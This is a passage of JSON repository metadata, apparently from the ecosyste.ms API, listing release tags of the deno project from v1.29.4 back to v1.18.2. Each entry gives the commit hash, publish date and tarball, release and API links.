74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1